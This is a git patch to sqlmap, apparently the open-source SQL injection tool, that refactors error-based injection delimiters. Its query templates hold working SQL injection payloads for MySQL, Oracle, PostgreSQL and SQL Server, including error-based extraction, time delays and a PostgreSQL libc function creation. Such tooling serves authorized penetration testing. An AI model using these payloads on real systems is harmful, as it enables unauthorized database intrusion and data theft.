From e24bff049741d8ae49c3768705fa5baad530f09b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 20 Oct 2010 09:46:57 +0000
Subject: [PATCH] nice refactoring

---
 lib/core/settings.py        | 8 ++++----
 lib/techniques/error/use.py | 6 +++++-
 xml/queries.xml             | 8 ++++----
 3 files changed, 13 insertions(+), 9 deletions(-)

diff --git a/lib/core/settings.py b/lib/core/settings.py
index 071a3bc88..79459cf4a 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -34,10 +34,10 @@ LOGGER.addHandler(LOGGER_HANDLER)
 LOGGER.setLevel(logging.WARN)
 
 # error based injection
-ERROR_SPACE        = "%c%c%c" % (58, 95, 58)
-ERROR_EMPTY_CHAR   = "%c%c%c" % (58, 120, 58)
-ERROR_START_CHAR   = "%c%c%c" % (58, 115, 58)
-ERROR_END_CHAR     = "%c%c%c" % (58, 101, 58)
+ERROR_SPACE        = ":_:"
+ERROR_EMPTY_CHAR   = ":x:"
+ERROR_START_CHAR   = ":s:"
+ERROR_END_CHAR     = ":e:"
 
 # System variables
 IS_WIN             = subprocess.mswindows
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index 109258a35..386136ff7 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -40,6 +40,8 @@ def errorUse(expression, resumeValue=True):
     query          = agent.prefixQuery(" %s" % queries[kb.misc.testedDbms].error)
     query          = agent.postfixQuery(query)
     payload        = agent.payload(newValue=query)
+    startLimiter   = ""
+    endLimiter     = ""
 
     if resumeValue:
         output = resume(expression, payload)
@@ -56,13 +58,15 @@ def errorUse(expression, resumeValue=True):
             nulledCastedField            = nulledCastedField.replace("CHAR(10000)", "CHAR(255)") #fix for that 'Subquery returns more than 1 row'
         expressionReplaced               = expression.replace(fieldToCastStr, nulledCastedField, 1)
         expressionUnescaped              = unescaper.unescape(expressionReplaced)
+        startLimiter                     = unescaper.unescape("'%s'" % ERROR_START_CHAR)
+        endLimiter                       = unescaper.unescape("'%s'" % ERROR_END_CHAR)
     else:
         expressionUnescaped              = unescaper.unescape(expression)
 
     debugMsg = "query: %s" % expressionUnescaped
     logger.debug(debugMsg)
 
-    forgedPayload = safeStringFormat(payload, (logic, randInt, expressionUnescaped))
+    forgedPayload = safeStringFormat(payload, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))
     result = Request.queryPage(urlencode(forgedPayload), content=True)
 
     match = re.search('%s(?P<result>.+?)%s' % (ERROR_START_CHAR, ERROR_END_CHAR), result[0], re.DOTALL | re.IGNORECASE)
diff --git a/xml/queries.xml b/xml/queries.xml
index fca6fd1e1..f4097fd9d 100644
--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -24,7 +24,7 @@
         <timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
         <substring query="MID((%s), %d, %d)"/>
         <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
-        <error query="%s (SELECT %s FROM(SELECT COUNT(*),CONCAT(CHAR(58),CHAR(115),CHAR(58),(%s),CHAR(58),CHAR(101),CHAR(58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)"/>
+        <error query="%s (SELECT %s FROM(SELECT COUNT(*),CONCAT(%s,(%s),%s,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)"/>
         <inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
         <banner query="SELECT VERSION()"/>
         <current_user query="SELECT CURRENT_USER()"/>
@@ -91,7 +91,7 @@
         <timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d00)"/>
         <substring query="SUBSTR((%s), %d, %d)"/>
         <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
-        <error query="%s %s=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(115)||CHR(58)||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||CHR(58)||CHR(101)||CHR(58)||CHR(62))) FROM DUAL)"/>
+        <error query="%s %s=(SELECT UPPER(XMLType(CHR(60)||%s||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||%s||CHR(62))) FROM DUAL)"/>
         <inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
         <banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
         <current_user query="SELECT USER FROM DUAL"/>
@@ -175,7 +175,7 @@
         <timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
         <substring query="SUBSTR((%s)::text, %d, %d)"/>
         <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
-        <error query="%s %s=CAST(CHR(58)||CHR(115)||CHR(58)||(%s)::text||CHR(58)||CHR(101)||CHR(58) AS NUMERIC)"/>
+        <error query="%s %s=CAST(%s||(%s)::text||%s AS NUMERIC)"/>
         <inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
         <banner query="SELECT VERSION()"/>
         <current_user query="SELECT CURRENT_USER"/>
@@ -242,7 +242,7 @@
         <timedelay query="WAITFOR DELAY '0:0:%d'"/>
         <substring query="SUBSTRING((%s), %d, %d)"/>
         <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
-        <error query="%s %s=CONVERT(INT,(CHAR(58)+CHAR(115)+CHAR(58)+(%s)+CHAR(58)+CHAR(101)+CHAR(58)))"/>
+        <error query="%s %s=CONVERT(INT,(%s+(%s)+%s))"/>
         <inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
         <banner query="SELECT @@VERSION"/>
         <current_user query="SELECT SYSTEM_USER"/>